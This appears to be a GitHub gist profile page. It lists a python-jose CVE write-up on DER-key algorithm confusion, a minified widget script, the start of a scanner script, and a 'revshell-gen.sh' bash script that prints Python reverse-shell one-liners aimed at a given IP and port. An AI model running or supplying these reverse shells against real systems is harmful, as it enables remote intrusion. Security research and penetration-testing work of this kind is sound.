Skip to content

Instantly share code, notes, and snippets.

View uug4na's full-sized avatar
🥷

uug4na

🥷
24 followers · 24 following
View GitHub Profile
@uug4na
uug4na / python-jose-der-key-confusion.md
Created February 24, 2026 10:10

python-jose 3.5.0: Incomplete Fix for CVE-2024-33663 — DER-Encoded Keys Bypass Algorithm Confusion Guard

Summary

The fix for CVE-2024-33663 in python-jose 3.5.0 added guards in HMACKey.__init__() that check is_pem_format(key) and is_ssh_key(key) to prevent asymmetric public keys from being used as HMAC secrets. However, DER-encoded (binary) public keys bypass both checks, enabling the same algorithm confusion attack that CVE-2024-33663 was intended to fix.

Affected version: python-jose 3.5.0 (latest release) CWE: CWE-327 (Use of a Broken or Risky Cryptographic Algorithm)

Root Cause

@uug4na
uug4na / addthis_widget.js
Created August 22, 2024 12:29
addthis_widget.js - backup
!function(e){function t(n){if(a[n])return a[n].exports;var o=a[n]={exports:{},id:n,loaded:!1};return e[n].call(o.exports,o,o.exports,t),o.loaded=!0,o.exports}var n=window.atwpjp;window.atwpjp=function(a,i){for(var r,s,c=0,l=[];c<a.length;c++)s=a[c],o[s]&&l.push.apply(l,o[s]),o[s]=0;for(r in i){var u=i[r];switch(typeof u){case"object":e[r]=function(t){var n=t.slice(1),a=t[0];return function(t,o,i){e[a].apply(this,[t,o,i].concat(n))}}(u);break;case"function":e[r]=u;break;default:e[r]=e[u]}}for(n&&n(a,i);l.length;)l.shift().call(null,t)};var a={},o={0:0};return t.e=function(e,n){if(0===o[e])return n.call(null,t);if(void 0!==o[e])o[e].push(n);else{o[e]=[n];var a=document.getElementsByTagName("head")[0],i=document.createElement("script");i.type="text/javascript",i.charset="utf-8",i.async=!0,i.src=t.p+""+({1:"custom-messages",227:"menu",229:"custom-messages-preview",231:"floating-css",233:"layers",234:"getcounts",235:"counter"}[e]||e)+"."+{1:"febb9e243de137d5e74d",2:"c8420cfcd8947e870ed4",3:"629362d1055012fa6109",4
@uug4na
uug4na / revshell-gen.sh
Last active June 9, 2024 10:55
#!/bin/bash
if [[ -z $3 ]];
then
echo "Usage: $0 <Language> <Ip> <Port>"
else
if [[ $1 == "Python" || $1 == "python" ]];
then
echo '"'">python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$2",$3));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'"'"'
echo '"'">python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("$2",$3));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'"'"'
fi
@uug4na
uug4na / all.py
Created June 9, 2024 10:40
import sys
import argparse
import subprocess
import os
parser = argparse.ArgumentParser(description='dummy scanner')
parser.add_argument('--domain', type=str, help='Domain name')
args = parser.parse_args()
domain = args.domain